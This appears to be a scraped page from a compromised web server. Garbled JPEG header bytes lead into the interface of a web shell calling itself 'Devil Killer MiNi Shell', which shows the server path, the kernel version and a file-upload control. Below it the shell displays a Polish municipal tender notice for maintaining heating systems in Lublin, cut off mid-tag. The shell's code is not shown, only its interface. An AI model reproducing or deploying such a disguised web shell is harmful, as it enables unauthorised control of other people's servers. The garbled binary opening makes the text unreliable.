JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241028/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241028/0056642101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usługi polegającej na bieżącej konserwacji instalacji c.o. i c.w. oraz węzłów cieplnych w budynkach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD NIERUCHOMOŚCI KOMUNALNYCH W LUBLINIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 430783940</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Grodzka 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lublin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">20-112</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">michal.makowski@znk.lublin.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.znk-lublin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samorządowy zakład budżetowy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Zarządzanie nieruchomościami </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usługi polegającej na bieżącej konserwacji instalacji c.o. i c.w. oraz węzłów cieplnych w budynkach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-35325632-dcec-4fc4-b625-e899d43cb278</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00566421</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00023500/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Konserwacja wewnętrznych instalacji c. o., c. w. i węzłów cieplnych w budynkach będących w zarządzie ZNK w Lublinie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-35325632-dcec-4fc4-b625-e899d43cb278 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-35325632-dcec-4fc4-b625-e899d43cb278</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowanie) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>2.	Dokumenty elektroniczne, o których mowa w §2 ust.1 rozporządzenia Prezesa Rady Ministrów <br/>w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, <br/>w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się je jako załączniki.<br/>W przypadku formatów, o których mowa w art. 66 ust.1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>3.	Informacje, oświadczenia lub dokumenty, inne niż wymienione w §2 ust.1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>3.1	w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności ( i przekazuje się jako załącznik), lub<br/>3.2	jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>4.	Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań <br/>i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>W przypadku załączników, które są zgodne z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone , zgodnie wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/ podmiotu udostępniającego zasoby , podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (tym wewnętrzny).<br/>5.	Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>6.	Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>7.	Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>8.	Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>9. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikacje Wykonawcy <br/>i Zamawiającego za pośrednictwem Platformy e-Zamówienia , Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres znk@znk-lublin.pl (nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w postępowaniu).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust.1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str.1) dalej „RODO”, Zamawiający informuje, że:<br/>2.	na mocy porozumienia o współadministrowaniu i zawartych w nim uzgodnień dotyczących celów, zakresu i sposobów przetwarzania danych współadministratorami Pani/Pana danych osobowych w zakresie prowadzenia postępowania są : Zarząd Nieruchomości Komunalnych w Lublinie, z siedzibą przy ul. Grodzkiej 12; 20 – 112 Lublin; może Pani/ Pan uzyskać informacje o przetwarzaniu Pani/Pana danych osobowych kierując pytania na adres poczty elektronicznej znk@znk-lublin.pl;<br/>3.	Inspektorem ochrony danych wyznaczonym przez Dyrektora Zarządu Nieruchomości Komunalnych w Lublinie jest Pan Paweł Tulej, e-mail – znk@znk-lublin.pl Tel.(81) 537 12 57;<br/>4.	Pani/Pana dane osobowe przetwarzane będą na podstawie art.6 ust.1 lit. C) RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego p.n.” Świadczenie usługi polegającej na bieżącej konserwacji instalacji c.o. i c.w. oraz węzłów cieplnych w budynkach” (znak sprawy :PN/KONS-COCW/2024)<br/>5.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art.78 ust.1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umów; zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych (tj. Dz.U z 2011 nr 14 , poz. 67 z późn zm.) teczki aktowe będą przechowywane w archiwum zakładowym przez okres 5 lat w przypadku dokumentacji zamówień publicznych oraz 10 lat w przypadku umów zwartych w wyniku postępowania w trybie zamówień publicznych;<br/>6.	posiada Pani/Pan:<br/>•	Na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>•	W przypadku, gdy wykonanie obowiązków, o których mowa w art.15 ust. 1-3 RODO wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, <br/>w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego;<br/>•	W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą , wskazania dodatkowych informacji mających w szczególności na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia publicznego.<br/>•	Na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (przy czym korzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>•	Na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust.2 RODO (przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>•	Wystąpienie z żądaniem, o którym mowa w art. 18 ust.1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">16.	nie przysługuje Pani/Panu:<br/>•	W związku z art. 17 ust.3 lit.b, d lub e RODO prawo do usunięcia danych osobowych;<br/>•	Prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>•	Na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawna przetwarzania Pani/Pana danych osobowych jest art. 6 ust.1 lit. C RODO.<br/>16.1 Jednocześnie Zamawiający przypomina o ciążącym na Wykonawcy obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, które dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od Wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art.14 ust.5 RODO.<br/>16.2	Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmiana wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamienia publicznego w zakresie niezgodnym z ustawą Pzp.<br/>16.3	W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust.1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PN/KONS-COCW/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Opis przedmiotu zamówienia oraz rodzaj czynności niezbędnych do realizacji zamówienia, których dotyczą wymagania zatrudnienia na podstawie umowy o pracę przez wykonawcę lub podwykonawcę osób wykonujących czynności w trakcie realizacji zamówienia.<br/>2.	Świadczenie usługi polegającej na bieżącej konserwacji instalacji c.o. i c.w. oraz węzłów cieplnych w budynkach wymienionych w załączniku nr 1 do wzoru umowy polegające na wykonaniu poniższych czynności:<br/>3.	Zakres konserwacji instalacji centralnego ogrzewania:<br/>1.	Zapewnienie prawidłowego funkcjonowania instalacji c.o. w oparciu o właściwą regulację czynnika grzewczego, zgodnie z warunkami uzgodnionymi z Usługodawcą.<br/>2.	Zatrzymanie oraz ponowne uruchomienie instalacji centralnego ogrzewania związane z prowadzeniem prac konserwacyjnych.<br/>3.	Miejscowe udrażnianie pionów, poziomów i zaworów na instalacji c.o.,<br/>4.	Usuwanie wszelkich przecieków na instalacji c.o.:<br/>•	miejscowa wymiana (do 2 mb) skorodowanych odcinków rur, wymiana szczeliwa na dławicach zaworów oraz w połączeniach gwintowanych,<br/>•	wymiana uszczelek na nieszczelnych połączeniach kołnierzowych i na pojedynczych elementach grzejnikowych (grzejniki żeliwne),<br/>•	wymiana pojedynczych uszkodzonych elementów grzejnika lub pojedynczych grzejników,<br/>•	wymiana pojedynczych zaworów,<br/>•	wymiana pojedynczych automatycznych odpowietrzników;<br/>5.	Usuwanie nie dogrzewań poprzez odpowietrzanie instalacji c.o. i pojedynczych grzejników oraz ich płukanie.<br/>6.	Kontrola pracy i regulacja zaworów przy grzejnikowych i innych zaworów nastawczych.<br/>7.	Wymiana pojedynczych kryz dławiących.<br/>8.	Demontaż pojedynczego grzejnika w przypadku awarii – zaślepienie gałązek wraz z ponownym montażem.<br/>9.	Próby ciśnieniowe pojedynczych grzejników wykonywane po naprawie lub zmianie powierzchni ogrzewalnej grzejnika. Naprawa zawieszenia grzejnika na wspornikach.<br/>10.	Miejscowe czyszczenie i malowanie elementów metalowych.<br/>11.	Miejscowe uzupełnianie (do 2 mb) izolacji termicznej na rurociągach instalacji c.o. (poziomy).<br/>12.	Współpraca z Usługodawcą w zakresie likwidacji nie dogrzewań i korekty mocy grzejników.<br/>13.	Dokonywanie pomiaru temperatury powietrza w lokalach w przypadku zgłoszonych nieprawidłowości.<br/><br/>4. Zakres konserwacji instalacji ciepłej wody:<br/><br/>1)	Zapewnienie prawidłowego funkcjonowania instalacji c.w. w oparciu o właściwą regulację instalacji.<br/>2)	Zatrzymanie oraz ponowne uruchomienie instalacji c.w. związane z prowadzeniem prac konserwacyjnych.<br/>3)	Miejscowe udrażnianie pionów i poziomów ciepłej wody bez wymiany rurociągów.<br/>4)	Usuwanie wszelkich przecieków na instalacji c.w.:<br/>a)	w uzasadnionych przypadkach miejscowa wymiana (do 2 mb) skorodowanych odcinków rur,<br/>b)	wymiana szczeliwa na dławicach zaworów oraz w połączeniach gwintowanych,<br/>c)	wymiana pojedynczych zaworów (z materiałów powierzonych).<br/>5)	Kontrola i regulacja zaworów regulacyjnych podpionowych.<br/>6)	Miejscowe czyszczenie i malowanie elementów metalowych.<br/>7)	Miejscowe uzupełnianie (do 2 mb) izolacji termicznej na rurociągach instalacji c.w. (poziomy).<br/>8)	Zakres konserwacji kończy się na zaworze odcinającym (wyłącznie) instalację c.w. (lokalówkę) wewnątrz lokalu.<br/>9)	Dokonywanie pomiaru temperatury ciepłej wody w punktach czerpalnych w przypadku zgłoszonych nieprawidłowości.<br/><br/>5. ZAKRES KONSERWACJI DLA WĘZŁÓW CIEPLNYCH WSZYTSKICH TYPÓW: <br/>1)	Regulacja i stały nadzór nad parametrami pracy węzła cieplnego.<br/>2)	Nadzorowanie stanu technicznego węzła cieplnego:<br/>a)	uruchamianie i wyłączanie węzła z ruchu związane z prowadzeniem prac konserwacyjnych,<br/>b)	likwidacja przecieków na złączach kołnierzowych (wymiana uszczelek i śrub w razie potrzeby),<br/>c)	likwidacja przecieków na dławicach pomp, zaworów i śrubunkach (uzupełnianie szczeliwa),<br/>d)	przegląd i czyszczenie siatek odmulaczy i filtrów (bez ich wymiany),<br/>e)	uzupełnianie oleju w tulejach termometrów, utrzymywanie w dobrym stanie technicznym termometrów,<br/>f)	smarowanie i doszczelnianie kurków manometrycznych, utrzymywanie w dobrym stanie technicznym manometrów (zgodnie z warunkami technicznymi); <br/>3)	Miejscowe czyszczenie i malowanie elementów metalowych.<br/>4)	Miejscowe uzupełnianie (do 2 mb) ubytków izolacji termicznej.<br/>5)	Okresowe sprawdzanie szczelności wymiennika.<br/>6)	Okresowe czyszczenie płyt wymiennika (bez kosztów uszczelek).<br/>7)	Okresowe czyszczenie dysz hydroelewatora.<br/>8)	Utrzymanie w sprawności technicznej naczynia zbiorczego.<br/>9)	Uzupełnianie instalacji c.o. wodą sieciową (uzdatnioną),<br/>10)	Zmiana nastaw regulatorów,<br/>11)	Sprawdzanie prawidłowości wskazań aparatury kontrolno-pomiarowej i automatyki wraz z wykonaniem czynności konserwacyjnych zgodnie z instrukcjami obsługi danych urządzeń,<br/>12)	Kontrola wraz z zapewnieniem prawidłowego działania instalacji elektrycznej zasilającej oraz instalacji i urządzeń elektrycznych w węźle cieplnym,<br/>13)	Wymiana wkładek bezpiecznikowych lub wyłączników instalacyjnych typu S,<br/>14)	Wymiana żarówek oświetleniowych, cewek w stycznikach,<br/>15)	Wymiana osprzętu tj. włączników oświetleniowych i gniazd (230V) oraz gniazd siłowych (400V) z materiałów powierzonych,<br/>16)	Kontrola zasilania elektrycznego tablic i rozdzielnic,<br/>17)	Granicę stron instalacji elektrycznej ustala się na zaciskach wejściowych do tablicy rozdzielczej węzła cieplnego,<br/>18)	Dokonywanie odczytów pojedynczych ciepłomierzy na prośbę Zamawiającego,<br/>19)	Dokonywanie odczytów podliczników elektrycznych służących do pomiaru ilości energii elektrycznej pobranej na potrzeby węzła na prośbę Zamawiającego,<br/>20)	Utrzymanie w należytym stanie sanitarno-porządkowym pomieszczeń węzłów cieplnych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50720000-8 - Usługi w zakresie napraw i konserwacji centralnego ogrzewania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2028-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Podstawę do ustalenia ceny oferty będzie stanowił sporządzony przez Wykonawcę kosztorys ofertowy, na podstawie otrzymanego od Zamawiającego wykazu powierzchni. <br/>1.2. Kosztorys ofertowy należy sporządzić na druku załączonym do oferty (zał. nr 1 do oferty). <br/>1.3 W celu określenia ceny za świadczenie usługi pogotowia technicznego należy wskazać miesięczną cenę jednostkową za 100 m2 powierzchni dla poszczególnych rodzajów lokali i obliczyć kwotę podatku VAT, a następnie kwotę z pozycji RAZEM pomnożyć przez 48 tj. okres obowiązywania umowy zgodnie z zał. nr 1 do oferty. Kwotę tę należy wpisać w pozycji 2 druku oferty.<br/>Cena oferty powinna być podana łącznie z obowiązującym podatkiem VAT na tego rodzaju usługę i zaokrąglona do dwóch miejsc po przecinku. <br/>1.4. Wykonawca przy obliczaniu ceny oferty uwzględnia wysokość minimalnego wynagrodzenia za pracę obowiązującego od 1 stycznia 2025r.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span 